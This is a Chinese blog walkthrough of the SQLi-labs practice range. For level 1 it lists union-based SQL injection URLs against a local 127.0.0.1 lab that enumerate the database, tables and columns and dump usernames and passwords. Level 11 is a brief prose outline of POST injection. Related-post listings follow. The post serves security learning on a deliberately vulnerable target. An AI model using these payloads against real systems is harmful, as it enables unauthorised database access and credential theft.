SQL-labs靶场

养只小羊7

已于 2024-07-22 18:13:03 修改

阅读量227

点赞数 11

分类专栏： sql-post sql注入文章标签：网络安全 web安全

于 2024-07-22 13:02:07 首次发布

本文链接：https://blog.csdn.net/weixin_69065643/article/details/140606761

版权

sql-post 同时被 2 个专栏收录

1 篇文章 0 订阅

订阅专栏

sql注入

1 篇文章 0 订阅

订阅专栏

第一关 ' 闭合

查看闭合方式加 ' 后发现报错注释后正常

使用and 1=1; and 1=2 测试是否存在sql注入

显示异常存在SQL注入漏洞

测试列数

存在三列

查看回显点并开始联合查询

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3-- -

查当前库名：

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,database() -- -

查表名：

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -

查user表中字段名：

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- -

查询password 和 username：

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users -- -

第十一关 post

本关为post，在输入尝试注入

输入 1' 发现报错注释后正常显示说明是'闭合

在密码框尝试注入发现也有报错

我们在username注入

此时正常

报错说明有2列；

判断回显点

开始联合查询

查询成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

养只小羊7

关注关注

11
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
SQL-labs靶场

输入 1' 发现报错注释后正常显示说明是'闭合。本关为post，在输入尝试注入。在密码框尝试注入发现也有报错。我们在username注入。
复制链接

扫一扫

专栏目录

sql-labs靶场

K_kiii的博客

01-26

415

将压缩包放置根目录下，找到sqil-connections并打开db-creds.inc。

SQL-Labs靶场“36-37”关通关教程

钟言的博客

03-19

3409

本篇为SQL-Labs靶场的36关到37关的通关教程，详细内容包含了：一、36关 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37关POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容

参与评论您还未登录，请先登录后发表或查看评论

SQL-Labs靶场“46-50”关通关教程

钟言的博客

02-24

1万+

本篇为SQL-Labs靶场的第46关到50关教程，详细内容包含了：四十六关 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入四十七关 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注三、四十八关 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注四、四十九关 ORDER BY单引号盲注1、源码分析 2、时间盲注五、五十关 ORDER BY数字型堆叠注等

sql-labs靶场环境搭建（手把手保姆级教学）

焦虑的焦虑

05-26

2124

sql-labs靶场搭建（保姆级手把手教学）你来你也行噢！

SQL-Labs靶场“34-35”关通关教程

钟言的博客

03-18

2527

本篇为SQL-Labs靶场的34到35关教程，详细内容包含了：34关 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35关 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容

SQL-Labs靶场“21-25”关通关教程

热门推荐

钟言的博客

02-20

1万+

本篇为SQL-Labs靶场的21关到25关通关教程，详细内容包含了、二十一关基于base64编码单引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入、二十二关基于base64编码双引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入二十三关基于GET过滤注释 1、源码分析 2、updatexml报错注入 3、联合查询注入四、二+四关基于POST存储型二次注入 1、源码分析 2、二次注入五、二十五关基于GET单引号OR、A等等

sql-labs靶场环境搭建

ljlrookiebird的博客

03-29

2786

有可能mysql无法打开，应该是和你本地的mysql冲突了，找到命令提示符界面右键使用管理员打开后，输入命令：sc delete mysql，删除你本地的mysql，记住用管理员打开，否则可能没有权限导致无法删除，删除后即可在phpstudy面板正常启动mysql服务。最近突然想对网安知识进行复习，然后就想起之前做过的sql-labs靶场，这个靶场对于我们学习sql注入的知识还是比较有帮助的，接下来我就记录下我的闯关过程吧，本文章一共分为环境搭建和闯关两部分。初始化完成后就可以愉快的开始闯关了。

SQL-Labs靶场“32-33”关通关教程

钟言的博客

03-14

5674

本篇为SQL-Labs靶场的第32关到33关的通关教程（宽字节注入），详细内容包含了、32关 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入、33关 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容

Sql-labs靶场(1~28)

xhx836161547的博客

12-29

4935

sql注入经典靶场Sql-labs全关详解，正在加急更新中

sql-labs靶场练习

m0_74097148的博客

03-04

395

这一关开始发现是post传参，是在输入框中输入，但总体思路不变一般POST型使用1' or 1=1 -- #和1" or 1=1 -- # 来判断闭合方式，成功的概率最大因单双引号引起的闭合问题更大点判断注入类型发现是字符型判断闭合方式（发现是单引号闭合）判断字段数（发现是两列）判断回显位（发现两列均可以回显）判断数据库名爆出表名爆出列名爆出用户名和密码采用“1\”直接爆出闭合方式为：（" ")判断字段数（发现是两列）如图是回显位爆出数据库名,语句和lese-1一样，闭合方式换换就可以了这关只有登录

sqli-labs靶场练习笔记

11-09

sqli-labs靶场练习笔记，里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关的练习内容，可以供给初学sql注入的学者参考

sqli-labs靶场

05-30

"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台，它提供了多种不同类型的SQL注入场景，帮助安全研究人员和开发人员了解并防御这种攻击。在sqli-labs靶场中，用户可以实践各种SQL注入技巧，如错误注入...

sqli-labs-master靶场安装下载

04-01

安装phpstudy、sqli-labs 适合人群：小白安装sqli-labs报错如何解决

phpstudy+靶场sqli-labs-master下载

11-08

【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全，尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8344

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

“微软蓝屏”事件暴露了网络安全哪些问题？

weixin_62595121的博客

07-22

1766

这次事件，源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新，它如同一颗隐形炸弹，在全球范围内引爆，导致近850万台设备遭遇故障，横跨航空、医疗、传媒等众多关键行业，甚至造成美国超过2.3万架次航班延误，其影响之广令人震惊。中国国际问题研究院助理研究员谢卉：私营部门在技术发展和创新上处于前沿，拥有很大的主导权，但是他们现在和公共利益的联系也越来越紧密，因此要加强对私营部门的监管，让他们投资建设更为可靠的网络基础设施，减少由单点故障带来的风险。报道称，英国多家药店的支付功能也一度出现问题。

【网络安全科普】勒索病毒防护指南

a38417的博客

07-20

1266

常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测，检测完成后和现有的病毒库中的特征数据进行匹配，如果可以匹配成功则找到病毒文件，因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机，它会立即开始加密用户的文件，包括文档、图片、视频等，并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7，原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护，一般会存在较多的无法及时修复的漏洞。

网络安全等级保护制度1.0与2.0的演进与变革

最新发布

gmqqcsdn的博客

07-23

571

等保1.0是我国在网络安全领域迈出的重要一步，它于2008年正式发布。该版本的等保制度以《信息安全技术信息系统安全等级保护基本要求》为核心标准，主要聚焦于信息系统的物理安全、网络安全、主机安全、应用安全和数据安全等方面的基础防护。等保1.0的实施对于提高我国信息系统的安全防护水平起到了积极的推动作用，但随着网络环境的快速变化和新型威胁的不断出现，等保1.0的局限性也逐渐显现。

sqli-labs靶场搭建

09-02

要搭建sqli-labs靶场，你可以按照以下步骤进行操作： 1. 首先，你需要下载sqli-labs的压缩包并解压缩。你可以在引用中提到的sqli-labs-master中找到这个压缩包。 2. 打开sqli-labs-master文件夹，在里面找到sqli-connections文件夹，并以记事本的方式打开db-creds.inc文件。这个文件包含了数据库的访问凭证，你需要根据你自己的数据库设置进行相应的修改。 3. 接下来，你需要点击sqli-labs页面中的"Setup/reset Database for labs"按钮，这将自动创建数据库、创建表并填充数据。你可以参考引用中提供的页面来确认是否成功创建了数据库。 4. 当数据库设置完成并成功创建后，你可以开始使用sqli-labs靶场进行SQL注入的练习。sqli-labs提供了一系列的漏洞场景和相应的源码，适合新手练习漏洞基础、Web安全、渗透等方面的知识。你可以参考引用中提到的sqli-labs靶场的描述和特点。需要注意的是，搭建sqli-labs靶场需要一定的数据库和Web服务器的基础知识，如果你对此不太熟悉，建议先学习相关知识再进行搭建。同时，在进行练习时，务必遵循法律和道德规范，仅供学习目的使用。123 #### 引用[.reference_title] - *1* *2* [sql-labs靶场环境搭建（手把手教你如何搭建）](https://blog.csdn.net/Joker_Dgh/article/details/123913722)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [sqli-labs-master.zip](https://download.csdn.net/download/weixin_43896279/12252977)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]